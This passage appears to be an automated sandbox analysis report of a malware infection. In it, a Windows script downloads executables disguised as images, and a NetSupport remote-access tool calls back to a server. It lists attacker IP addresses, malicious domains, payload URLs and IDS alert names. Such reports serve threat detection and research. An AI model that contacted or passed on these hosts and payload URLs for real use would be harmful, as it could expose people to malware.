3620 WScript.exe GET 404 45.12.215.157:80 http://45.12.215.157/images/2.jpg unknown
html
suspicious
3620 WScript.exe GET 404 45.12.215.157:80 http://45.12.215.157/images/3.jpg unknown
html
suspicious
3620 WScript.exe GET 404 45.12.215.157:80 http://45.12.215.157/images/2.jpg unknown
html
suspicious
3620 WScript.exe GET 404 45.12.215.157:80 http://45.12.215.157/images/3.jpg unknown
html
suspicious
3620 WScript.exe GET 404 45.12.215.157:80 http://45.12.215.157/images/4.jpg unknown
html
suspicious
3620 WScript.exe GET 404 45.12.215.157:80 http://45.12.215.157/images/2.jpg unknown
html
suspicious
3620 WScript.exe GET 404 45.12.215.157:80 http://45.12.215.157/images/3.jpg unknown
html
suspicious
3620 WScript.exe GET 404 45.12.215.157:80 http://45.12.215.157/images/4.jpg unknown
html
suspicious
3620 WScript.exe GET 404 45.12.215.157:80 http://45.12.215.157/images/5.jpg unknown
html
suspicious
2268 client32.exe POST –– 5.45.73.63:4151 http://5.45.73.63/fakeurl.htm NL
binary
––
––
suspicious

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID Process IP ASN CN Reputation
3556 iexplore.exe 185.206.213.173:443 LeaseWeb Netherlands B.V. NL unknown
3076 iexplore.exe 204.79.197.200:80 Microsoft Corporation US whitelisted
3556 iexplore.exe 88.99.66.31:443 Hetzner Online GmbH DE suspicious
3076 iexplore.exe 185.206.213.173:443 LeaseWeb Netherlands B.V. NL unknown
3872 powershell.exe 185.206.213.173:443 LeaseWeb Netherlands B.V. NL unknown
2432 WScript.exe 88.99.66.31:443 Hetzner Online GmbH DE suspicious
2432 WScript.exe 45.12.215.157:80 –– suspicious
3620 WScript.exe 45.12.215.157:80 –– suspicious
3896 temp69.exe 185.212.130.9:443 Virtual Trade Ltd NL malicious
2268 client32.exe 5.45.73.63:4151 Serverius Holding B.V. NL suspicious
2268 client32.exe 195.171.92.116:80 British Telecommunications PLC GB unknown

DNS requests

Domain IP Reputation
radiobox-online.org 185.206.213.173
unknown
www.bing.com 204.79.197.200
13.107.21.200
whitelisted
2no.co 88.99.66.31
malicious
avheaven.icu 185.212.130.9
malicious
geo.netsupportsoftware.com 195.171.92.116
62.172.138.35
malicious

Threats

PID Process Class Message
3556 iexplore.exe Potential Corporate Privacy Violation POLICY [PTsecurity] IP Check Domain SSL certificate
3556 iexplore.exe Potential Corporate Privacy Violation POLICY [PTsecurity] IP Check Domain SSL certificate
2432 WScript.exe Potential Corporate Privacy Violation POLICY [PTsecurity] IP Check Domain SSL certificate
2432 WScript.exe Potential Corporate Privacy Violation POLICY [PTsecurity] IP Check Domain SSL certificate
3620 WScript.exe A Network Trojan was detected ET CURRENT_EVENTS Likely Evil EXE download from dotted Quad by MSXMLHTTP M1
3620 WScript.exe A Network Trojan was detected ET CURRENT_EVENTS Likely Evil EXE download from dotted Quad by MSXMLHTTP M2
3620 WScript.exe A Network Trojan was detected ET CURRENT_EVENTS Likely Evil EXE download from MSXMLHTTP non-exe extension M2
3620 WScript.exe A Network Trojan was detected ET TROJAN JS/WSF Downloader Dec 08 2016 M4
3620 WScript.exe Potentially Bad Traffic ET INFO SUSPICIOUS Dotted Quad Host MZ Response
3620 WScript.exe Misc activity SUSPICIOUS [PTsecurity] PE as Image Content type mismatch
3620 WScript.exe A Network Trojan was detected ET CURRENT_EVENTS Likely Evil EXE download from dotted Quad by MSXMLHTTP M1
–– –– Potentially Bad Traffic ET INFO DNS Query for Suspicious .icu Domain
3896 temp69.exe Potentially Bad Traffic ET INFO Suspicious Domain (*.icu) in TLS SNI
3896 temp69.exe Potentially Bad Traffic ET INFO Observed Let's Encrypt Certificate for Suspicious TLD (.icu)
2268 client32.exe A Network Trojan was detected SUSPICIOUS [PTsecurity] NetSupport Remote Admin
2268 client32.exe A Network Trojan was detected SUSPICIOUS [PTsecurity] NetSupport Remote Admin
2268 client32.exe A Network Trojan was detected SUSPICIOUS [PTsecurity] NetSupport Remote Admin
2268 client32.exe A Network Trojan was detected SUSPICIOUS [PTsecurity] NetSupport Remote Admin
2268 client32.exe A Network Trojan was detected SUSPICIOUS [PTsecurity] NetSupport Remote Admin

9 ETPRO signatures available at the full report

Debug output strings

Process Message
client32.exe Assert, tid=93c, tid=93c
client32.exe Assert, tid=93c, tid=93c
client32.exe Assert, tid=93c, tid=93c